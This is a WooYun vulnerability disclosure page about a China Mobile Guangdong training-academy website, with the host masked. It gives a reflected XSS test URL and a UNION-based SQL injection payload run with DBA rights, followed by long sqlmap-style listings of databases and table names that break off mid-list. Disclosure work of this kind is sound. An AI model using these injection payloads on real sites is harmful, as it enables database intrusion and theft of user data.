当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0154091

漏洞标题:中国移动通信集团广东有限公司(培训学院)多个漏洞,造成大量用户信息泄露

相关厂商:中国移动

漏洞作者: 路人甲

提交时间:2015-11-18 17:48

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-18: 细节已通知厂商并且等待厂商处理中
2015-11-24: 厂商已经确认,细节仅向厂商公开
2015-12-04: 细节向核心白帽子及相关领域专家公开
2015-12-14: 细节向普通白帽子公开
2015-12-24: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

中国移动通信集团广东有限公司(培训学院)多个漏洞

详细说明:

URL: http://**.**.**.**/zc/

图片1.png


图片2.png


图片3.png


漏洞证明:

XSS漏洞
http://**.**.**.**:80/zc//zhuanti/learnmap/kefu.php?action=kefu'%22()%26%25<acx><ScRiPt%20>alert(/XSS/)</ScRiPt>

图片4.png


DBA权限SQL注入漏洞:
Payload:
http://**.**.**.**:80/zc/zhuanti/learnmap/action.php?action=
wuxianyouhua' AND 3 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7169
687871,0x6c5662716157444d6257,0x7171637071),NULL,NULL,NULL#21=6 AND '000ZSoN'='0
00ZSoN&type=l
GET action

图片5.png


DBA权限

图片6.png


可以拿下整改数据库
web application technology: Nginx, PHP 5.5.11
back-end DBMS: MySQL 5.0
Database: kc
[160 tables]
+----------------------------------------------------+
| phpcms_admin |
| phpcms_admin_role |
| phpcms_admin_role_priv |
| phpcms_ads |
| phpcms_ads_1106 |
| phpcms_ads_1107 |
| phpcms_ads_1108 |
| phpcms_ads_1110 |
| phpcms_ads_1111 |
| phpcms_ads_1203 |
| phpcms_ads_1204 |
| phpcms_ads_1205 |
| phpcms_ads_1206 |
| phpcms_ads_1207 |
| phpcms_ads_1208 |
| phpcms_ads_1209 |
| phpcms_ads_1210 |
| phpcms_ads_1211 |
| phpcms_ads_1212 |
| phpcms_ads_1301 |
| phpcms_ads_1302 |
| phpcms_ads_1303 |
| phpcms_ads_1305 |
| phpcms_ads_1307 |
| phpcms_ads_1308 |
| phpcms_ads_1309 |
| phpcms_ads_1310 |
| phpcms_ads_1311 |
| phpcms_ads_1312 |
| phpcms_ads_1401 |
| phpcms_ads_1402 |
| phpcms_ads_place |
| phpcms_ads_stat |
| phpcms_announce |
| phpcms_area |
| phpcms_ask |
| phpcms_ask_actor |
| phpcms_ask_credit |
| phpcms_ask_posts |
| phpcms_ask_vote |
| phpcms_attachment |
| phpcms_author |
| phpcms_block |
| phpcms_c_doc |
| phpcms_c_down |
| phpcms_c_info |
| phpcms_c_ku6video |
| phpcms_c_news |
| phpcms_c_picture |
| phpcms_c_product |
| phpcms_c_video |
| phpcms_cache_count |
| phpcms_category |
| phpcms_collect |
| phpcms_comment |
| phpcms_content |
| phpcms_content_count |
| phpcms_content_position |
| phpcms_content_tag |
| phpcms_copyfrom |
| phpcms_count |
| phpcms_datasource |
| phpcms_digg |
| phpcms_digg_log |
| phpcms_editor_data |
| phpcms_error_report |
| phpcms_form_msssg |
| phpcms_formguide |
| phpcms_formguide_fields |
| phpcms_guestbook |
| phpcms_hits |
| phpcms_ipbanned |
| phpcms_keylink |
| phpcms_keyword |
| phpcms_link |
| phpcms_linkage |
| phpcms_log |
| phpcms_mail |
| phpcms_mail_email |
| phpcms_mail_email_type |
| phpcms_member |
| phpcms_member_cache |
| phpcms_member_company |
| phpcms_member_detail |
| phpcms_member_group |
| phpcms_member_group_extend |
| phpcms_member_group_priv |
| phpcms_member_info |
| phpcms_menu |
| phpcms_message |
| phpcms_model |
| phpcms_model_field |
| phpcms_module |
| phpcms_mood |
| phpcms_mood_data |
| phpcms_order |
| phpcms_order_deliver |
| phpcms_order_log |
| phpcms_pay_card |
| phpcms_pay_exchange |
| phpcms_pay_payment |
| phpcms_pay_pointcard_type |
| phpcms_pay_stat |
| phpcms_pay_user_account |
| phpcms_player |
| phpcms_position |
| phpcms_process |
| phpcms_process_status |
| phpcms_role |
| phpcms_score |
| phpcms_search |
| phpcms_search_type |
| phpcms_session |
| phpcms_space |
| phpcms_space_api |
| phpcms_special |
| phpcms_special_content |
| phpcms_spider_job |
| phpcms_spider_sites |
| phpcms_spider_urls |
| phpcms_status |
| phpcms_talent |
| phpcms_talent_role |
| phpcms_talent_type |
| phpcms_times |
| phpcms_type |
| phpcms_urlrule |
| phpcms_video |
| phpcms_video_count |
| phpcms_video_data |
| phpcms_video_position |
| phpcms_video_special |
| phpcms_video_special_list |
| phpcms_video_tag |
| phpcms_vote_data |
| phpcms_vote_option |
| phpcms_vote_subject |
| phpcms_vote_useroption |
| phpcms_workflow |
| phpcms_yp_apply |
| phpcms_yp_buy |
| phpcms_yp_cert |
| phpcms_yp_collect |
| phpcms_yp_count |
| phpcms_yp_guestbook |
| phpcms_yp_job |
| phpcms_yp_news |
| phpcms_yp_product |
| phpcms_yp_relation |
| phpcms_yp_stats |
| phpcms_yp_stock |
| talent_role |
| view_phpcms_content |
| wafast_doc |
| wafast_doc_paragraph |
| wafast_doc_version |
| wafast_score |
| wafast_user_log |
| wafast_wiki_role |
| wafast_wiki_user |
+----------------------------------------------------+
Database: empirecms
[182 tables]
+----------------------------------------------------+
| ecms_ecms_article |
| ecms_ecms_article_data_1 |
| ecms_ecms_article_doc |
| ecms_ecms_article_doc_data |
| ecms_ecms_download |
| ecms_ecms_download_data_1 |
| ecms_ecms_download_doc |
| ecms_ecms_download_doc_data |
| ecms_ecms_flash |
| ecms_ecms_flash_data_1 |
| ecms_ecms_flash_doc |
| ecms_ecms_flash_doc_data |
| ecms_ecms_info |
| ecms_ecms_info_data_1 |
| ecms_ecms_info_doc |
| ecms_ecms_info_doc_data |
| ecms_ecms_infoclass_article |
| ecms_ecms_infoclass_download |
| ecms_ecms_infoclass_flash |
| ecms_ecms_infoclass_info |
| ecms_ecms_infoclass_movie |
| ecms_ecms_infoclass_news |
| ecms_ecms_infoclass_photo |
| ecms_ecms_infoclass_shop |
| ecms_ecms_infotmp_article |
| ecms_ecms_infotmp_download |
| ecms_ecms_infotmp_flash |
| ecms_ecms_infotmp_info |
| ecms_ecms_infotmp_movie |
| ecms_ecms_infotmp_news |
| ecms_ecms_infotmp_photo |
| ecms_ecms_infotmp_shop |
| ecms_ecms_movie |
| ecms_ecms_movie_data_1 |
| ecms_ecms_movie_doc |
| ecms_ecms_movie_doc_data |
| ecms_ecms_news |
| ecms_ecms_news_data_1 |
| ecms_ecms_news_doc |
| ecms_ecms_news_doc_data |
| ecms_ecms_photo |
| ecms_ecms_photo_data_1 |
| ecms_ecms_photo_doc |
| ecms_ecms_photo_doc_data |
| ecms_ecms_shop |
| ecms_ecms_shop_data_1 |
| ecms_ecms_shop_doc |
| ecms_ecms_shop_doc_data |
| ecms_enewsad |
| ecms_enewsadclass |
| ecms_enewsadminstyle |
| ecms_enewsbefrom |
| ecms_enewsbq |
| ecms_enewsbqclass |
| ecms_enewsbqtemp |
| ecms_enewsbqtempclass |
| ecms_enewsbuybak |
| ecms_enewsbuygroup |
| ecms_enewscard |
| ecms_enewsclass |
| ecms_enewsclassadd |
| ecms_enewsclassf |
| ecms_enewsclasstemp |
| ecms_enewsclasstempclass |
| ecms_enewsdiggips |
| ecms_enewsdo |
| ecms_enewsdolog |
| ecms_enewsdownerror |
| ecms_enewsdownrecord |
| ecms_enewsdownurlqz |
| ecms_enewserrorclass |
| ecms_enewsf |
| ecms_enewsfava |
| ecms_enewsfavaclass |
| ecms_enewsfeedback |
| ecms_enewsfeedbackclass |
| ecms_enewsfeedbackf |
| ecms_enewsfile |
| ecms_enewsgbook |
| ecms_enewsgbookclass |
| ecms_enewsgfenip |
| ecms_enewsgroup |
| ecms_enewshy |
| ecms_enewshyclass |
| ecms_enewsindexpage |
| ecms_enewsinfoclass |
| ecms_enewsinfotype |
| ecms_enewsinfovote |
| ecms_enewsjstemp |
| ecms_enewsjstempclass |
| ecms_enewskey |
| ecms_enewslink |
| ecms_enewslinkclass |
| ecms_enewslinktmp |
| ecms_enewslisttemp |
| ecms_enewslisttempclass |
| ecms_enewslog |
| ecms_enewsloginfail |
| ecms_enewsmember |
| ecms_enewsmemberadd |
| ecms_enewsmemberf |
| ecms_enewsmemberfeedback |
| ecms_enewsmemberform |
| ecms_enewsmembergbook |
| ecms_enewsmembergroup |
| ecms_enewsmenu |
| ecms_enewsmenuclass |
| ecms_enewsmod |
| ecms_enewsnewstemp |
| ecms_enewsnewstempclass |
| ecms_enewsnotcj |
| ecms_enewspage |
| ecms_enewspageclass |
| ecms_enewspagetemp |
| ecms_enewspayapi |
| ecms_enewspayrecord |
| ecms_enewspic |
| ecms_enewspicclass |
| ecms_enewspl |
| ecms_enewspl_data_1 |
| ecms_enewsplayer |
| ecms_enewsplf |
| ecms_enewspltemp |
| ecms_enewspostdata |
| ecms_enewspostserver |
| ecms_enewsprinttemp |
| ecms_enewspublic |
| ecms_enewspubtemp |
| ecms_enewspubvar |
| ecms_enewspubvarclass |
| ecms_enewsqmsg |
| ecms_enewssearch |
| ecms_enewssearchall |
| ecms_enewssearchall_load |
| ecms_enewssearchtemp |
| ecms_enewssearchtempclass |
| ecms_enewsshopdd |
| ecms_enewsshoppayfs |
| ecms_enewsshopps |
| ecms_enewssp |
| ecms_enewssp_1 |
| ecms_enewssp_2 |
| ecms_enewssp_3 |
| ecms_enewssp_3_bak |
| ecms_enewsspacestyle |
| ecms_enewsspclass |
| ecms_enewssql |
| ecms_enewstable |
| ecms_enewstags |
| ecms_enewstagsclass |
| ecms_enewstagsdata |
| ecms_enewstask |
| ecms_enewstempbak |
| ecms_enewstempgroup |
| ecms_enewstempvar |
| ecms_enewstempvarclass |
| ecms_enewstogzts |
| ecms_enewsuser |
| ecms_enewsuseradd |
| ecms_enewsuserclass |
| ecms_enewsuserjs |
| ecms_enewsuserlist |
| ecms_enewsvote |
| ecms_enewsvotemod |
| ecms_enewsvotetemp |
| ecms_enewswapstyle |
| ecms_enewswfinfo |
| ecms_enewswfinfolog |
| ecms_enewswords |
| ecms_enewsworkflow |
| ecms_enewsworkflowitem |
| ecms_enewswriter |
| ecms_enewsyh |
| ecms_enewszt |
| ecms_enewsztadd |
| ecms_enewsztclass |
| ecms_enewsztf |
| ecms_jjt_teacher |
| uc_company |
| uc_group |
| uc_groupmember |
| uc_members |
+----------------------------------------------------+
Database: tms
[75 tables]
+----------------------------------------------------+
| applystudents |
| cardlist |
| classroom |
| classscheduledetail |
| classscheduleheader |
| course |
| course_copy |
| coursetype |
| enrollcomment |
| enrolltemplate |
| fileinfo |
| flowapplydetail |
| flowapplyheader |
| flowaudit |
| flowdetail |
| flowheader |
| invitationletter |
| invitationtemplate |
| numbernistribution |
| outsidestudent |
| outstandingstudents |
| personinfo |
| project |
| projectcourse |
| projectcourseclass |
| projectdocument |
| projecttask |
| projecttasklog |
| projecttype |
| proline |
| qm_classlog |
| qm_classsurvey |
| qm_satisfactiondetail |
| qm_satisfactionheader |
| qm_satisfactiontemplate |
| qm_studentparticipation |
| receivednotice |
| receptionlist |
| reportstudents |
| stayinfo |
| survey |
| surveydetresult |
| surveymastresult |
| surveyobject |
| surveyquestion |
| surveyquestionitem |
| surveyquestionitemtemplate |
| surveyquestiontemplate |
| surveyreply |
| surveytemplate |
| sys_auditparameters |
| sys_dictionarydetail |
| sys_dictionaryheader |
| sys_operatecode |
| sys_organization |
| sys_reporttemplate |
| sys_right |
| sys_role |
| sys_roleright |
| sys_roleuser |
| sys_user |
| teacherinfo |
| teacherunit |
| teacherunittype |
| tempnotice |
| tmp_sys_user |
| trainingclass |
| trainingclassclassroom |
| trainingclasskpi |
| trainingclassteacher |
| usergroupposition |
| uum_organizationinfo |
| uum_userinfo |
| vprojectyearview |
| zc_tms |
+----------------------------------------------------+
Database: ulearning
[134 tables]
+----------------------------------------------------+
| ulearning_uc_admins |
| ulearning_uc_applications |
| ulearning_uc_badwords |
| ulearning_uc_domains |
| ulearning_uc_failedlogins |
| ulearning_uc_feeds |
| ulearning_uc_friends |
| ulearning_uc_groupmember |
| ulearning_uc_mailqueue |
| ulearning_uc_memberfields |
| ulearning_uc_members |
| ulearning_uc_mergemembers |
| ulearning_uc_newpm |
| ulearning_uc_notelist |
| ulearning_uc_org |
| ulearning_uc_pm_indexes |
| ulearning_uc_pm_lists |
| ulearning_uc_pm_members |
| ulearning_uc_pm_messages_0 |
| ulearning_uc_pm_messages_1 |
| ulearning_uc_pm_messages_2 |
| ulearning_uc_pm_messages_3 |
| ulearning_uc_pm_messages_4 |
| ulearning_uc_pm_messages_5 |
| ulearning_uc_pm_messages_6 |
| ulearning_uc_pm_messages_7 |
| ulearning_uc_pm_messages_8 |
| ulearning_uc_pm_messages_9 |
| ulearning_uc_pms |
| ulearning_uc_portal |
| ulearning_uc_protectedmembers |
| ulearning_uc_settings |
| ulearning_uc_sqlcache |
| ulearning_uc_tags |
| ulearning_uc_uum |
| ulearning_uc_vars |
| ulearning_uchome_ad |
| ulearning_uchome_adminsession |
| ulearning_uchome_album |
| ulearning_uchome_app_ask |
| ulearning_uchome_app_ask_reply |
| ulearning_uchome_app_ask_type |
| ulearning_uchome_appcreditlog |
| ulearning_uchome_ask_attachment |
| ulearning_uchome_ask_tag |
| ulearning_uchome_attention |
| ulearning_uchome_blacklist |
| ulearning_uchome_block |
| ulearning_uchome_block2 |
| ulearning_uchome_blog |
| ulearning_uchome_blogfield |
| ulearning_uchome_cache |
| ulearning_uchome_category |
| ulearning_uchome_class |
| ulearning_uchome_click |
| ulearning_uchome_clickuser |
| ulearning_uchome_comment |
| ulearning_uchome_config |
| ulearning_uchome_creditlog |
| ulearning_uchome_creditrule |
| ulearning_uchome_cron |
| ulearning_uchome_data |
| ulearning_uchome_docomment |
| ulearning_uchome_doing |
| ulearning_uchome_doing_attachment |
| ulearning_uchome_doing_topic |
| ulearning_uchome_event |
| ulearning_uchome_eventclass |
| ulearning_uchome_eventfield |
| ulearning_uchome_eventinvite |
| ulearning_uchome_eventpic |
| ulearning_uchome_exchange_address |
| ulearning_uchome_exchange_level |
| ulearning_uchome_exchange_log |
| ulearning_uchome_exchange_period |
| ulearning_uchome_exchange_prize |
| ulearning_uchome_favorite |
| ulearning_uchome_feed |
| ulearning_uchome_friend |
| ulearning_uchome_friendguide |
| ulearning_uchome_friendlog |
| ulearning_uchome_invite |
| ulearning_uchome_log |
| ulearning_uchome_magic |
| ulearning_uchome_magicinlog |
| ulearning_uchome_magicstore |
| ulearning_uchome_magicuselog |
| ulearning_uchome_mailcron |
| ulearning_uchome_mailqueue |
| ulearning_uchome_member |
| ulearning_uchome_mtag |
| ulearning_uchome_mtaginvite |
| ulearning_uchome_myapp |
| ulearning_uchome_myinvite |
| ulearning_uchome_news |
| ulearning_uchome_notification |
| ulearning_uchome_pic |
| ulearning_uchome_picfield |
| ulearning_uchome_poke |
| ulearning_uchome_poll |
| ulearning_uchome_pollfield |
| ulearning_uchome_polloption |
| ulearning_uchome_polluser |
| ulearning_uchome_post |
| ulearning_uchome_profield |
| ulearning_uchome_profilefield |
| ulearning_uchome_report |
| ulearning_uchome_session |
| ulearning_uchome_share |
| ulearning_uchome_show |
| ulearning_uchome_space |
| ulearning_uchome_spacefield |
| ulearning_uchome_spaceinfo |
| ulearning_uchome_spacelog |
| ulearning_uchome_stat |
| ulearning_uchome_statuser |
| ulearning_uchome_tag |
| ulearning_uchome_tagblog |
| ulearning_uchome_tagspace |
| ulearning_uchome_task |
| ulearning_uchome_thread |
| ulearning_uchome_thread_category |
| ulearning_uchome_topic |
| ulearning_uchome_topicuser |
| ulearning_uchome_userapp |
| ulearning_uchome_userappfield |
| ulearning_uchome_userevent |
| ulearning_uchome_usergroup |
| ulearning_uchome_userlog |
| ulearning_uchome_usermagic |
| ulearning_uchome_usertask |
| ulearning_uchome_visitor |
| ulearning_ulearning_uchome_ad |
| uum_logid_user |
+----------------------------------------------------+
Database: performance_schema
[52 tables]
+----------------------------------------------------+
| accounts |
| cond_instances |
| events_stages_current |
| events_stages_history |
| events_stages_history_long |
| events_stages_summary_by_account_by_event_name |
| events_stages_summary_by_host_by_event_name |
| events_stages_summary_by_thread_by_event_name |
| events_stages_summary_by_user_by_event_name |
| events_stages_summary_global_by_event_name |
| events_statements_current |
| events_statements_history |
| events_statements_history_long |
| events_statements_summary_by_account_by_event_name |
| events_statements_summary_by_digest |
| events_statements_summary_by_host_by_event_name |
| events_statements_summary_by_thread_by_event_name |
| events_statements_summary_by_user_by_event_name |
| events_statements_summary_global_by_event_name |
| events_waits_current |
| events_waits_history |
| events_waits_history_long |
| events_waits_summary_by_account_by_event_name |
| events_waits_summary_by_host_by_event_name |
| events_waits_summary_by_instance |
| events_waits_summary_by_thread_by_event_name |
| events_waits_summary_by_user_by_event_name |
| events_waits_summary_global_by_event_name |
| file_instances |
| file_summary_by_event_name |
| file_summary_by_instance |
| host_cache |
| hosts |
| mutex_instances |
| objects_summary_global_by_type |
| performance_timers |
| rwlock_instances |
| session_account_connect_attrs |
| session_connect_attrs |
| setup_actors |
| setup_consumers |
| setup_instruments |
| setup_objects |
| setup_timers |
| socket_instances |
| socket_summary_by_event_name |
| socket_summary_by_instance |
| table_io_waits_summary_by_index_usage |
| table_io_waits_summary_by_table |
| table_lock_waits_summary_by_table |
| threads |
| users |
+----------------------------------------------------+
Database: big
[6 tables]
+----------------------------------------------------+
| cdb_common_votedata |
| share_classroom |
| share_classroom_baoming |
| zhuanti_all |
| zhuanti_email |
| zhuanti_microread |
+----------------------------------------------------+
Database: uchome
[89 tables]
+----------------------------------------------------+
| ulearning_uchome_ad |
| ulearning_uchome_adminsession |
| ulearning_uchome_album |
| ulearning_uchome_app_ask |
| ulearning_uchome_app_ask_reply |
| ulearning_uchome_app_ask_type |
| ulearning_uchome_appcreditlog |
| ulearning_uchome_ask_attachment |
| ulearning_uchome_ask_tag |
| ulearning_uchome_blacklist |
| ulearning_uchome_block |
| ulearning_uchome_blog |
| ulearning_uchome_blogfield |
| ulearning_uchome_cache |
| ulearning_uchome_class |
| ulearning_uchome_click |
| ulearning_uchome_clickuser |
| ulearning_uchome_comment |
| ulearning_uchome_creditlog |
| ulearning_uchome_creditrule |
| ulearning_uchome_cron |
| ulearning_uchome_data |
| ulearning_uchome_docomment |
| ulearning_uchome_doing |
| ulearning_uchome_event |
| ulearning_uchome_eventclass |
| ulearning_uchome_eventfield |
| ulearning_uchome_eventinvite |
| ulearning_uchome_eventpic |
| ulearning_uchome_exchange_address |
| ulearning_uchome_exchange_level |
| ulearning_uchome_exchange_log |
| ulearning_uchome_exchange_period |
| ulearning_uchome_exchange_prize |
| ulearning_uchome_favorite |
| ulearning_uchome_feed |
| ulearning_uchome_friend |
| ulearning_uchome_friendguide |
| ulearning_uchome_friendlog |
| ulearning_uchome_invite |
| ulearning_uchome_log |
| ulearning_uchome_magic |
| ulearning_uchome_magicinlog |
| ulearning_uchome_magicstore |
| ulearning_uchome_magicuselog |
| ulearning_uchome_mailcron |
| ulearning_uchome_mailqueue |
| ulearning_uchome_member |
| ulearning_uchome_mtag |
| ulearning_uchome_mtaginvite |
| ulearning_uchome_myapp |
| ulearning_uchome_myinvite |
| ulearning_uchome_notification |
| ulearning_uchome_pic |
| ulearning_uchome_picfield |
| ulearning_uchome_poke |
| ulearning_uchome_poll |
| ulearning_uchome_pollfield |
| ulearning_uchome_polloption |
| ulearning_uchome_polluser |
| ulearning_uchome_post |
| ulearning_uchome_profield |
| ulearning_uchome_profilefield |
| ulearning_uchome_report |
| ulearning_uchome_session |
| ulearning_uchome_share |
| ulearning_uchome_show |
| ulearning_uchome_space |
| ulearning_uchome_spacefield |
| ulearning_uchome_spaceinfo |
| ulearning_uchome_spacelog |
| ulearning_uchome_stat |
| ulearning_uchome_statuser |
| ulearning_uchome_tag |
| ulearning_uchome_tagblog |
| ulearning_uchome_tagspace |
| ulearning_uchome_task |
| ulearning_uchome_thread |
| ulearning_uchome_thread_category |
| ulearning_uchome_topic |
| ulearning_uchome_topicuser |
| ulearning_uchome_userapp |
| ulearning_uchome_userappfield |
| ulearning_uchome_userevent |
| ulearning_uchome_usergroup |
| ulearning_uchome_userlog |
| ulearning_uchome_usermagic |
| ulearning_uchome_usertask |
| ulearning_uchome_visitor |
+----------------------------------------------------+
Database: ec
[343 tables]
+----------------------------------------------------+
| anli_vote_anli |
| anli_vote_voter |
| choice_course |
| class_anli_vote |
| course |
| course_supermarket |
| course_supermarket_detail |
| course_supermarket_history |
| course_supermarket_userinfo |
| ecms_ecms_anlidasai |
| ecms_ecms_anlidasai_data_1 |
| ecms_ecms_anlidasai_doc |
| ecms_ecms_anlidasai_doc_data |
| ecms_ecms_article |
| ecms_ecms_article_data_1 |
| ecms_ecms_article_doc |
| ecms_ecms_article_doc_data |
| ecms_ecms_city |
| ecms_ecms_city_data_1 |
| ecms_ecms_city_doc |
| ecms_ecms_city_doc_data |
| ecms_ecms_cuttingedgeconsulting |
| ecms_ecms_cuttingedgeconsulting_data_1 |
| ecms_ecms_cuttingedgeconsulting_doc |
| ecms_ecms_cuttingedgeconsulting_doc_data |
| ecms_ecms_daystar |
| ecms_ecms_daystar_data_1 |
| ecms_ecms_daystar_doc |
| ecms_ecms_daystar_doc_data |
| ecms_ecms_download |
| ecms_ecms_download_data_1 |
| ecms_ecms_download_doc |
| ecms_ecms_download_doc_data |
| ecms_ecms_expert |
| ecms_ecms_expert_data_1 |
| ecms_ecms_expert_doc |
| ecms_ecms_expert_doc_data |
| ecms_ecms_fileupload |
| ecms_ecms_fileupload_data_1 |
| ecms_ecms_fileupload_doc |
| ecms_ecms_fileupload_doc_data |
| ecms_ecms_flash |
| ecms_ecms_flash_data_1 |
| ecms_ecms_flash_doc |
| ecms_ecms_flash_doc_data |
| ecms_ecms_friendconnect |
| ecms_ecms_friendconnect_data_1 |
| ecms_ecms_friendconnect_doc |
| ecms_ecms_friendconnect_doc_data |
| ecms_ecms_ilearning |
| ecms_ecms_ilearning_data_1 |
| ecms_ecms_ilearning_doc |
| ecms_ecms_ilearning_doc_data |
| ecms_ecms_info |
| ecms_ecms_info_data_1 |
| ecms_ecms_info_doc |
| ecms_ecms_info_doc_data |
| ecms_ecms_infoclass_anlidasai |
| ecms_ecms_infoclass_article |
| ecms_ecms_infoclass_city |
| ecms_ecms_infoclass_cuttingedgeconsulting |
| ecms_ecms_infoclass_daystar |
| ecms_ecms_infoclass_download |
| ecms_ecms_infoclass_expert |
| ecms_ecms_infoclass_fileupload |
| ecms_ecms_infoclass_flash |
| ecms_ecms_infoclass_friendconnect |
| ecms_ecms_infoclass_ilearning |
| ecms_ecms_infoclass_info |
| ecms_ecms_infoclass_knowledgecenter |
| ecms_ecms_infoclass_learningtopics |
| ecms_ecms_infoclass_learningvoice |
| ecms_ecms_infoclass_message |
| ecms_ecms_infoclass_microread |
| ecms_ecms_infoclass_movie |
| ecms_ecms_infoclass_news |
| ecms_ecms_infoclass_photo |
| ecms_ecms_infoclass_qualitycourses |
| ecms_ecms_infoclass_shop |
| ecms_ecms_infoclass_student |
| ecms_ecms_infoclass_teacher |
| ecms_ecms_infoclass_training |
| ecms_ecms_infoclass_zhibo |
| ecms_ecms_infoclass_zhuanti |
| ecms_ecms_infotmp_anlidasai |
| ecms_ecms_infotmp_article |
| ecms_ecms_infotmp_city |
| ecms_ecms_infotmp_cuttingedgeconsulting |
| ecms_ecms_infotmp_daystar |
| ecms_ecms_infotmp_download |
| ecms_ecms_infotmp_expert |
| ecms_ecms_infotmp_fileupload |
| ecms_ecms_infotmp_flash |
| ecms_ecms_infotmp_friendconnect |
| ecms_ecms_infotmp_ilearning |
| ecms_ecms_infotmp_info |
| ecms_ecms_infotmp_knowledgecenter |
| ecms_ecms_infotmp_learningtopics |
| ecms_ecms_infotmp_learningvoice |
| ecms_ecms_infotmp_message |
| ecms_ecms_infotmp_microread |
| ecms_ecms_infotmp_movie |
| ecms_ecms_infotmp_news |
| ecms_ecms_infotmp_photo |
| ecms_ecms_infotmp_qualitycourses |
| ecms_ecms_infotmp_shop |
| ecms_ecms_infotmp_student |
| ecms_ecms_infotmp_teacher |
| ecms_ecms_infotmp_training |
| ecms_ecms_infotmp_zhibo |
| ecms_ecms_infotmp_zhuanti |
| ecms_ecms_knowledgecenter |
| ecms_ecms_knowledgecenter_data_1 |
| ecms_ecms_knowledgecenter_doc |
| ecms_ecms_knowledgecenter_doc_data |
| ecms_ecms_learningtopics |
| ecms_ecms_learningtopics_data_1 |
| ecms_ecms_learningtopics_doc |
| ecms_ecms_learningtopics_doc_data |
| ecms_ecms_learningvoice |
| ecms_ecms_learningvoice_data_1 |
| ecms_ecms_learningvoice_doc |
| ecms_ecms_learningvoice_doc_data |
| ecms_ecms_message |
| ecms_ecms_message_data_1 |
| ecms_ecms_message_doc |
| ecms_ecms_message_doc_data |
| ecms_ecms_microread |
| ecms_ecms_microread_data_1 |
| ecms_ecms_microread_doc |
| ecms_ecms_microread_doc_data |
| ecms_ecms_movie |
| ecms_ecms_movie_data_1 |
| ecms_ecms_movie_doc |
| ecms_ecms_movie_doc_data |
| ecms_ecms_news |
| ecms_ecms_news_data_1 |
| ecms_ecms_news_doc |
| ecms_ecms_news_doc_data |
| ecms_ecms_photo |
| ecms_ecms_photo_data_1 |
| ecms_ecms_photo_doc |
| ecms_ecms_photo_doc_data |
| ecms_ecms_qualitycourses |
| ecms_ecms_qualitycourses_data_1 |
| ecms_ecms_qualitycourses_doc |
| ecms_ecms_qualitycourses_doc_data |
| ecms_ecms_shop |
| ecms_ecms_shop_data_1 |
| ecms_ecms_shop_doc |
| ecms_ecms_shop_doc_data |
| ecms_ecms_student |
| ecms_ecms_student_data_1 |
| ecms_ecms_student_doc |
| ecms_ecms_student_doc_data |
| ecms_ecms_teacher |
| ecms_ecms_teacher_data_1 |
| ecms_ecms_teacher_doc |
| ecms_ecms_teacher_doc_data |
| ecms_ecms_training |
| ecms_ecms_training_data_1 |
| ecms_ecms_training_doc |
| ecms_ecms_training_doc_data |
| ecms_ecms_zhibo |
| ecms_ecms_zhibo_data_1 |
| ecms_ecms_zhibo_doc |
| ecms_ecms_zhibo_doc_data |
| ecms_ecms_zhuanti |
| ecms_ecms_zhuanti_data_1 |
| ecms_ecms_zhuanti_doc |
| ecms_ecms_zhuanti_doc_data |
| ecms_enewsad |
| ecms_enewsadclass |
| ecms_enewsadminstyle |
| ecms_enewsbefrom |
| ecms_enewsbq |
| ecms_enewsbqclass |
| ecms_enewsbqtemp |
| ecms_enewsbqtempclass |
| ecms_enewsbuybak |
| ecms_enewsbuygroup |
| ecms_enewscard |
| ecms_enewsclass |
| ecms_enewsclassadd |
| ecms_enewsclassf |
| ecms_enewsclasstemp |
| ecms_enewsclasstempclass |
| ecms_enewsdiggips |
| ecms_enewsdo |
| ecms_enewsdolog |
| ecms_enewsdownerror |
| ecms_enewsdownrecord |
| ecms_enewsdownurlqz |
| ecms_enewserrorclass |
| ecms_enewsf |
| ecms_enewsfava |
| ecms_enewsfavaclass |
| ecms_enewsfeedback |
| ecms_enewsfeedbackclass |
| ecms_enewsfeedbackf |
| ecms_enewsfile |
| ecms_enewsgbook |
| ecms_enewsgbookclass |
| ecms_enewsgfenip |
| ecms_enewsgroup |
| ecms_enewshy |
| ecms_enewshyclass |
| ecms_enewsindexpage |
| ecms_enewsinfoclass |
| ecms_enewsinfotype |
| ecms_enewsinfovote |
| ecms_enewsjstemp |
| ecms_enewsjstempclass |
| ecms_enewskey |
| ecms_enewslink |
| ecms_enewslinkclass |
| ecms_enewslinktmp |
| ecms_enewslisttemp |
| ecms_enewslisttempclass |
| ecms_enewslog |
| ecms_enewsloginfail |
| ecms_enewsmember |
| ecms_enewsmemberadd |
| ecms_enewsmemberf |
| ecms_enewsmemberfeedback |
| ecms_enewsmemberform |
| ecms_enewsmembergbook |
| ecms_enewsmembergroup |
| ecms_enewsmenu |
| ecms_enewsmenuclass |
| ecms_enewsmod |
| ecms_enewsnewstemp |
| ecms_enewsnewstempclass |
| ecms_enewsnotcj |
| ecms_enewspage |
| ecms_enewspageclass |
| ecms_enewspagetemp |
| ecms_enewspayapi |
| ecms_enewspayrecord |
| ecms_enewspic |
| ecms_enewspicclass |
| ecms_enewspl |
| ecms_enewspl_data_1 |
| ecms_enewsplayer |
| ecms_enewsplf |
| ecms_enewspltemp |
| ecms_enewspostdata |
| ecms_enewspostserver |
| ecms_enewsprinttemp |
| ecms_enewspublic |
| ecms_enewspubtemp |
| ecms_enewspubvar |
| ecms_enewspubvarclass |
| ecms_enewsqmsg |
| ecms_enewssearch |
| ecms_enewssearchall |
| ecms_enewssearchall_load |
| ecms_enewssearchtemp |
| ecms_enewssearchtempclass |
| ecms_enewsshopdd |
| ecms_enewsshoppayfs |
| ecms_enewsshopps |
| ecms_enewssp |
| ecms_enewssp_1 |
| ecms_enewssp_2 |
| ecms_enewssp_3 |
| ecms_enewssp_3_bak |
| ecms_enewsspacestyle |
| ecms_enewsspclass |
| ecms_enewssql |
| ecms_enewstable |
| ecms_enewstags |
| ecms_enewstagsclass |
| ecms_enewstagsdata |
| ecms_enewstask |
| ecms_enewstempbak |
| ecms_enewstempgroup |
| ecms_enewstempvar |
| ecms_enewstempvarclass |
| ecms_enewstogzts |
| ecms_enewsuser |
| ecms_enewsuseradd |
| ecms_enewsuserclass |
| ecms_enewsuserjs |
